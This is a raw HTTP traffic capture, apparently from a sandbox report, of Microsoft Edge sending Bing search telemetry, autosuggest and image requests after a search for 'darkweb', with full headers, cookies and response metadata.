GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.SpSbInteract%22%2C%22TS%22%3A1733306943075%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306943079%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%22%2C%22AsResponseLength%22%3A%22390%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306943185%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%2Cig%3A225FA5CBA999466DB7F89B91073D9FF2%22%2C%22AnswerInfo%22%3A%22HS%3B7%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306943199%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20%2Ci%3A1%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306943972%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22sbox%22%3A%22typing%22%2C%22time%22%3A13601%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306943974%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f23069
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=darkweb&mkt=en-gb&qry=darkweb%20d&cp=9&csr=1&msbqf=false&pths=1&cvid=202035EC43B64C3DBF7FE10F53408EC5

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /AS/Suggestions?pt=page.serp&bq=darkweb&mkt=en-gb&qry=darkweb%20d&cp=9&csr=1&msbqf=false&pths=1&cvid=202035EC43B64C3DBF7FE10F53408EC5 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f23083
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Adarkweb%20%2Ci%3A1%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306943977%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20%2Ci%3A1%22%2C%22AsResponseLength%22%3A%22395%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306944064%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20%2Ci%3A1%2Cig%3A6C384D4A2FBD488E9AF7AA19361A9E67%22%2C%22AnswerInfo%22%3A%22SS%3B21%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306944064%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20%2Ci%3A1%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306944077%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A8%2C%20%5C%22GL%5C%22%3A13%2C%20%5C%22IG%5C%22%3A%5C%226C384D4A2FBD488E9AF7AA19361A9E67%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306944077%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20d%2Ci%3A2%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306945355%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20d%2Ci%3A2%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306945361%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20d%2Ci%3A2%22%2C%22AsResponseLength%22%3A%22693%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306945474%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20d%2Ci%3A2%2Cig%3AA25C00CFF6AE4E4F8E05C979C0ADBEF7%22%2C%22AnswerInfo%22%3A%22CT%3B16%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306945474%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Adarkweb%20%2Ci%3A1%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306943977%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20%2Ci%3A1%22%2C%22AsResponseLength%22%3A%22395%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306944064%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20%2Ci%3A1%2Cig%3A6C384D4A2FBD488E9AF7AA19361A9E67%22%2C%22AnswerInfo%22%3A%22SS%3B21%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306944064%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20%2Ci%3A1%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306944077%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A8%2C%20%5C%22GL%5C%22%3A13%2C%20%5C%22IG%5C%22%3A%5C%226C384D4A2FBD488E9AF7AA19361A9E67%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306944077%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20d%2Ci%3A2%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306945355%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20d%2Ci%3A2%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306945361%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20d%2Ci%3A2%22%2C%22AsResponseLength%22%3A%22693%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306945474%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20d%2Ci%3A2%2Cig%3AA25C00CFF6AE4E4F8E05C979C0ADBEF7%22%2C%22AnswerInfo%22%3A%22CT%3B16%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306945474%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

cache-control: private
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
access-control-allow-origin: *
x-eventid: 67502a4c02fe4910b67eb4434ccf339b
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-VwhfjjenMBzuhKM0/sJW+mBm2GvIyLull8SutyHiFJg='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 50B970787829428DA5EE0624954F7C35 Ref B: LON601060103031 Ref C: 2024-12-04T10:09:16Z
content-length: 0
date: Wed, 04 Dec 2024 10:09:16 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:09:16 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f2307e
GET

https://www.bing.com/th?id=OSK.26b33f47e15c5c5164fa04635e0f303e&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.26b33f47e15c5c5164fa04635e0f303e&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
cache-control: private, max-age=0
content-encoding: br
expires: Wed, 04 Dec 2024 10:08:16 GMT
vary: Accept-Encoding
x-eventid: 67502a4c5fc14ff08d3cba4e30517d13
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
strict-transport-security: max-age=31536000; includeSubDomains; preload
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-dUZZK73jyv78M2MNwk3F5rS6Afv48TIacuAsTxC7UwQ='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp&ndcParam=QWthbWFp"}]}
report-to: {"group":"crossorigin-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0,"include_subdomains":true}
cross-origin-embedder-policy-report-only: 'require-corp; report-to=\"crossorigin-errors\"'
cross-origin-opener-policy-report-only: 'same-origin; report-to=\"crossorigin-errors\"'
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f23084
set-cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1; Domain=.bing.com; Path=/; Expires=Wed, 04 Dec 2024 12:09:16 GMT; Max-Age=7200; Secure
POST

https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1733306947016}&log=UserEvent

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1733306947016}&log=UserEvent HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
